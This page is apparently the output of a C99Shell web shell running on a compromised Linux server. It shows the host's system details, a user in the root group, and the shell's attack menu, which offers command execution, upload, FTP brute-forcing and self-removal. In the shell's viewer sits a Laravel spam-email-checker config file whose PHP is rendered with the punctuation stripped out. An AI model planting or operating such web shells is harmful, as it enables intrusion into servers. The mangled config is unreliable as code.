!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/config/   drwxr-xr-x
Free 29.37 GB of 117.98 GB (24.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     laravel-spammail-checker.php (5.51 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This file is part of the Laravel Spam Mail Checker package.
 *
 * (c) Josiah Endurance <hendurhance.dev@gmail.com
 *
 * @license MIT
 *
 * For the full license information, please view the LICENSE
 * file that was distributed with this source code.
 *
 * @since 2.0.0
 * @see https://github.com/hendurhance/laravel-spam-email
 */

return [
    
/*
    |--------------------------------------------------------------------------
    | Laravel Spam Email Default Driver
    |--------------------------------------------------------------------------
    |
    | This option controls the default email validation driver that will be
    | used to check if an email address is a spam address. This option is
    | set to 'local' by default.
    |
    | Supported: "local", "remote", "abstractapi", "quickemailverification", "verifalia", "sendgrid"
    |
    | - Local: This driver uses a local file `resources/config/emails.txt` to check if an email address is a spam address.
    | - Remote: This driver uses php in-built functions to check if an email address is a spam address.
    | - AbstractAPI: This driver uses AbstractAPI to check if an email address is a spam address.
    |               @see https://www.abstractapi.com/email-verification-validation-api
    | - QuickEmailVerification: This driver uses QuickEmailVerification to check if an email address is a spam address.
    |               @see https://quickemailverification.com/
    | - Verifalia: This driver uses Verifalia to check if an email address is a spam address.
    |               @see https://verifalia.com/
    | - SendGrid: This driver uses SendGrid to check if an email address is a spam address.
    |               @see https://sendgrid.com/solutions/email-api/email-address-validation-api/
    |
    */

    
'default' => env('SPAM_MAIL_CHECKER_DEFAULT_DRIVER''local'),

    
/*
    |--------------------------------------------------------------------------
    | Laravel Spam Email Drivers
    |--------------------------------------------------------------------------
    |
    | Here you may configure the settings for each driver that is used to check
    | if an email address is a spam address. You can add as many drivers as
    | you want.
    |
    */

    
'drivers' => [
        
'local' => [
            
'path' => 'resources/config/emails.txt',
            
'cache_key' => 'spammailchecker_'.base64_encode('resources/config/emails.txt'),
            
'cache_ttl' => 60 60 24 7// 1 week
            
'whitelist' => [
                
'gmail.com',
                
'yahoo.com',
            ],
            
'blacklist' => [
                
'mail.com',
                
'hoo.com',
            ],
        ],
        
'remote' => [
            
'timeout' => 5,
            
'check_dns' => true,
            
'check_smtp' => false,
            
'check_mx' => true,
        ],
        
'abstractapi' => [
            
'api_url' => 'https://emailvalidation.abstractapi.com/v1',
            
'api_key' => env('ABSTRACTAPI_API_KEY'),
            
'score' => 0.5// The score threshold to consider an email address as spam.
            
'accept_disposable_email' => true// This option is to be used with caution, as it may block legitimate email addresses.
        
],
        
'quickemailverification' => [
            
'api_url' => 'https://api.quickemailverification.com/v1',
            
'api_key' => env('QUICKEMAILVERIFICATION_API_KEY'),
            
'accept_disposable_email' => true// This option is to be used with caution, as it may block legitimate email addresses.
        
],
        
'verifalia' => [
            
'api_url' => 'https://api.verifalia.com/'// The base URL of the Verifalia API.
            
'base_uris' => [
                
'https://api-1.verifalia.com/',
                
'https://api-2.verifalia.com/',
                
'https://api-3.verifalia.com/',
            ],
            
'version' => 'v2.4'// The version of the Verifalia API to use.
            
'username' => env('VERIFALIA_USERNAME'),
            
'password' => env('VERIFALIA_PASSWORD'),
            
'accept_disposable_email' => true// This option is to be used with caution, as it may block legitimate email addresses.
        
],
        
'sendgrid' => [
            
'api_url' => 'https://api.sendgrid.com/v3/validations/email',
            
'api_key' => env('SENDGRID_API_KEY'),
            
'score' => 0.5// The score threshold to consider an email address as spam.
            
'accept_disposable_email' => true// This option is to be used with caution, as it may block legitimate email addresses.
            
'source' => 'signup'// The source of the email address to be validated.
        
],
    ],

    
/*
    |--------------------------------------------------------------------------
    | Laravel Spam Email Rule
    |--------------------------------------------------------------------------
    |
    | Here you may configure the settings for each rule that is used to check
    | if an email address is a spam address. You can change the rule to be
    | used to check if an email address is a spam address.
    |
    */

    
'rule' => 'spammail'// The rule to be used to check if an email address is a spam address.

    /*
    |--------------------------------------------------------------------------
    | Laravel Spam Email Error Message
    |--------------------------------------------------------------------------
    |
    | Here you may configure the error message that is returned when an email
    | address is considered as a spam address.
    |
    */

    
'error_message' => 'The :attribute is considered as a spam address.',
];

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0042 ]--